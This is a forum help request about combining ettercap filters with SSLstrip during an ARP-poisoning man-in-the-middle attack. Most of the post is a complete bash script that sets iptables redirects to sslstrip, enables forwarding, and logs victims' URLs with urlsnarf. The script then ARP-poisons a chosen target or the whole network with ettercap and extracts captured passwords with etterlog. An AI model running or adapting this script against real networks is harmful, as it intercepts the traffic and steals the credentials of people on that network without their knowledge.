Hello,
I've googled for days and haven't found a simple answer to my issue. I am trying to get ettercap filters to work along with SSLstrip while doing an ARP poisoning MITM attack. I am able to get filters to work fine without SSLstrip, but once I enable SSLstrip the filters stop working. I believe this is because the PREROUTING command used in most tutorials and scripts sends everything to sslstrip before ettercap is done with the packets. I believe an OUTPUT rule defined by uid would take care of the problem. However, BT4 R1 doesn't include the ipt_owner module.
1) Is there an easy way to get the ipt_owner module working? I see a lot of posts telling people not to recompile, and I've never done so before, but I'm willing to play around since I have my USB persistent install cloned to another drive.
2) Is there an alternate method of routing only traffic originating from ettercap to sslstrip?
I was thinking something along the lines of:
Code:
iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner ettercap --dport 80 -j REDIRECT --to-port 10000
to replace:
Code:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
Am I approaching this correctly? Is there another way to do it?
Thanks for any advice and the great distro/resources here.
Here is the full script.
Code:
#!/bin/bash
# modified scripts found on backtrack-linux.org by killadninja, tedbear
# Make sure /etc/etter.conf is commented out as such
# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

# Ask for the session settings (interface, log folder name, gateway and target)
echo -n "What interface to use? ie wlan0: "
read -e IFACE
echo -n "Name of \"Session\"? (name of the folder that will be created with all the log files): "
read -e SESSION
echo -n "Gateway IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
read -e ROUTER
echo -n "Target IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
read -e VICTIM
# Log folder for this session
mkdir -p "/root/$SESSION/"
# Setup network
echo "[+] Setting up iptables"
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
echo 1 > /proc/sys/net/ipv4/ip_forward
sleep 1
# Sslstrip (currently commented out)
echo "[+] Starting sslstrip..."
#xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -a -k -w "/root/$SESSION/$SESSION.log" &
sleep 2
# urlsnarf
echo "[+] Starting urlsnarf..."
urlsnarf -i "$IFACE" | grep http > "/root/$SESSION/$SESSION.txt" &
sleep 1
#arpspoof
#echo "[+] Starting arpspoof..."
#xterm -geometry 75x15+1+200 -T arpspoof -e arpspoof -i wlan0 -t 192.168.1.79 192.168.1.1 &
#xterm -geometry 75x15+1+200 -T arpspoof -e arpspoof -i wlan0 -t 192.168.1.1 192.168.1.79 &
# Ettercap
echo
echo "[+] Starting ettercap..."
xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -hold -e ettercap -Tq -F ig.ef -i "$IFACE" -w "/root/$SESSION/$SESSION.pcap" -L "/root/$SESSION/$SESSION" -P autoadd -M arp:remote /"$ROUTER"/ /"$VICTIM"/ &
# Show the current forwarding state and nat rules for a quick sanity check
cat /proc/sys/net/ipv4/ip_forward
iptables -t nat -L
#auto add hosts append -P autoadd
sleep 1
echo
echo "[+] IMPORTANT..."
echo "After you have finished please close mitmssl and clean up properly by hitting y,
if mitmssl is not closed properly ERRORS WILL OCCUR "
read WISH
# Clean up
if [ "$WISH" = "y" ] ; then
echo
echo "[+] Cleaning mitmssl and resetting iptables..."
killall sslstrip
killall ettercap
killall python
killall urlsnarf
killall xterm
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
etterlog -p -i "/root/$SESSION/$SESSION.eci"
echo "[+] Clean up successful..."
echo "[+] Thank you for using mitmssl Good Bye..."
exit
fi
exit